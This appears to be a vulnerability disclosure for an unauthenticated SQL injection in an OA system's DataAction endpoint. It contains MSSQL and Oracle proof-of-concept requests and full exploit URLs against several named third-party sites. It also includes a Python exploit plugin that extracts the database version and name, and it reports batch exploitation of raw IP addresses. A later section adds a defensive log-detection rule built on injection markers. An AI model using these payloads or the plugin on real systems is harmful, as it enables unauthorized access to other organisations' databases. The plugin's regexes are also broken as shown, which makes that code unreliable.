An OA General SQL Injection Vulnerability
1) General SQL injection vulnerability. Vendor: Source Day Software
URL: http://www.visionsoft.com.cn/
Vulnerable path: ServiceAction/com.velcro.base.DataAction
Note: the OA system is deployed on both MSSQL and Oracle databases, so the two PoC variants below cover both.
POC:
MSSQL database:
ServiceAction/com.velcro.base.DataAction?SQL=%20select%20categoryids%20from%20project%20where%20id='' and 1=2 union all select @@version&isworkflow=true
Oracle database:
ServiceAction/com.velcro.base.DataAction?SQL=%20select%20categoryids%20from%20project%20where%20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
(Direct access):
MSSQL
A) http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction?SQL=%20select%20categoryids%20from%20project%20where%20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
B) http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction?SQL=%20select%20categoryids%20from%20project%20where%20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
C) http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction?SQL=%20select%20categoryids%20from%20project%20where%20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
Oracle
D) http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction?SQL=%20select%20categoryids%20from%20project%20where%20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
E) http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction?SQL=%20select%20categoryids%20from%20project%20where%20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true
2) The plug-in code written to support TangScan is provided directly below (I am a novice, please don't flame the code). By the time this is published, the plug-in has already been submitted to TangScan.com.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (c) 2013-2014 TangScan developers (http://www.wooyun.org/)
See the file 'docs/COPYING' for copying permission
author: fate0
"""

import re
from thirdparty import requests
from modules.exploit import TSExploit

__all__ = ['tangscan']


class TangScan(TSExploit):
    def __init__(self):
        super(self.__class__, self).__init__()
        self.info = {
            "name": "OA system SQL injection (MSSQL) vulnerability (login not required)",
            "product": "Source Day",
            "product_version": "",
            "desc": "The SQL parameter of OA /ServiceAction/com.velcro.base.DataAction is injectable and may leak sensitive data",
            "license": self.license.TS,
            "author": ["Coody"],
            "ref": [{self.ref.wooyun: "NONE"}],
            "type": self.type.injection,
            "severity": self.severity.high,
            "privileged": False,
            "disclosure_date": "2015-07-22",
            "create_date": "2015-07-23",
        }

        self.register_option({
            "url": {
                "default": "",
                "required": True,
                "choices": [],
                "convert": self.convert.url_field,
                "desc": "target url"
            }
        })

        self.register_result({
            "status": False,
            "data": {"db_info": {"version": "", "current_db": ""}},
            "description": "",
            "error": ""
        })

    def verify(self):
        self.print_debug("verify start")
        # The delimiters around the capture group were lost when the page was extracted;
        # the pattern is kept as the page shows it.
        re_version_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?SQL=%20select%20categoryids%20from%20project"
                   "%20where%20id='' and 1=2 union all select @@version&isworkflow=true").format(domain=self.option.url)
        try:
            response = requests.get(exp_url, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_version_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.db_info.version = re_result[0]
        self.result.description = "target {url} has SQL injection. target database version: {db_version}".format(
            url=self.option.url, db_version=re_result[0])

    def exploit(self):
        self.print_debug("exploit start")
        # Same note as in verify(): the delimiters around the group were lost in extraction.
        re_userinfo_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE)
        exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?SQL=%20select%20categoryids%20from%20project"
                   "%20where%20id='' and 1=2 union all select db_name()&isworkflow=true").format(domain=self.option.url)
        try:
            response = requests.get(exp_url, timeout=15, verify=False)
        except Exception as e:
            self.result.error = str(e)
            return

        re_result = re_userinfo_pattern.findall(response.content)
        if len(re_result) == 0:
            self.result.status = False
            return

        self.result.status = True
        self.result.data.db_info.current_db = re_result[0]
        self.result.description = "target {url} has SQL injection, database name: {current_db}".format(
            url=self.option.url, current_db=self.result.data.db_info.current_db)


if __name__ == '__main__':
    from modules.main import main
    main(TangScan())
Results after running the plug-in:
Run --mode verify (the default)
Run --mode exploit
The plug-in runs normally and outputs the data as expected.
This could have ended here, but to be thorough, the results of a batch detection script run against several sites are also provided.
The tested websites are:
http://60.12.113.234:8080/
http://121.14.195.31:8081/
http://218.246.22.194:8080/
In the test, --mode exploit was run to obtain the database names in batch.
After the test completed, the success.txt result file was checked.
That's all for this one.
Solution:
Filter the input.
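Besides filtering at the endpoint, a defender can look for this pattern in existing web-server logs. The following detection rule is an added example, not code from the advisory or from the vendor: it parses combined-format access log lines (constructed here), decodes the SQL parameter of requests to the DataAction path, and grades them by the UNION and version-banner markers used in the PoCs above. The log format, marker list and severity labels are my assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

DATAACTION_PATH = "/ServiceAction/com.velcro.base.DataAction"

# Payload fragments seen in the advisory's PoCs: UNION probing and version-banner reads.
INJECTION_MARKERS = re.compile(
    r"union\s+(?:all\s+)?select|@@version|v_\$version|\bdb_name\s*\(", re.IGNORECASE)

# Combined log format (assumed); only the client IP and the request target are used.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(target):
    """Return None for unrelated requests, else (severity, decoded SQL parameter)."""
    url = urlsplit(target)
    if not url.path.endswith(DATAACTION_PATH):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if "SQL" not in params:
        return None
    # parse_qs decodes once; decode again so double-encoded payloads are still readable.
    sql = unquote_plus(params["SQL"][0]).strip()
    if INJECTION_MARKERS.search(sql):
        return ("high", sql)
    # The endpoint executes whatever SQL it is handed, so even a benign-looking
    # statement from an unauthenticated client deserves review.
    return ("medium", sql)

def scan_access_log(lines):
    """Return [(client_ip, severity, decoded_sql)] for suspicious DataAction requests."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m is None:
            continue
        verdict = classify_request(m.group("target"))
        if verdict is not None:
            findings.append((m.group("ip"), verdict[0], verdict[1]))
    return findings

# Constructed sample lines (not real traffic); the first two follow the PoC shapes above, the second double-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Jul/2015:09:10:11 +0800] "GET /ServiceAction/com.velcro.base.DataAction?SQL=%20select%20categoryids%20from%20project%20where%20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true HTTP/1.1" 200 873',
    '203.0.113.5 - - [22/Jul/2015:09:10:12 +0800] "GET /ServiceAction/com.velcro.base.DataAction?SQL=%2520select%2520categoryids%2520from%2520project%2520where%2520id%3D%2527%2527%2520union%2520all%2520select%2520(select%2520banner%2520from%2520sys.v_%24version%2520where%2520rownum%3D1)%2520from%2520dual&isworkflow=true HTTP/1.1" 200 910',
    '198.51.100.7 - - [22/Jul/2015:09:11:00 +0800] "GET /ServiceAction/com.velcro.base.DataAction?SQL=select%20categoryids%20from%20project%20where%20id%3D17&isworkflow=true HTTP/1.1" 200 310',
    '198.51.100.9 - - [22/Jul/2015:09:12:00 +0800] "GET /index.jsp HTTP/1.1" 200 2048',
]
```

Calling scan_access_log(SAMPLE_LOG) flags the two PoC-shaped requests as high and the plain query as medium; the unrelated page is ignored.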